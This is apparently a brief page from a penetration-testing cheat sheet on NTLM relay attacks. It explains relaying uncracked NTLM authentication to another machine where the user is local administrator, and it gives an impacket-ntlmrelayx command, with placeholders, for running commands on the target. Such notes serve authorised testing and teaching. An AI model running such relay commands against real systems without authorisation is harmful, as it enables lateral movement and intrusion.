Last updated 6 months ago
Was this helpful?
If you are unable to crack the NTLM hash, we can try to relay the authentication to another system. In fact, a user on one machine might be local administrator on another. If he is, we can run commands (no UAC confirmation required).
sudo impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_RETRANSMISSION> -c "<COMMAND_TO_EXECUTE_ON_TARGET>"
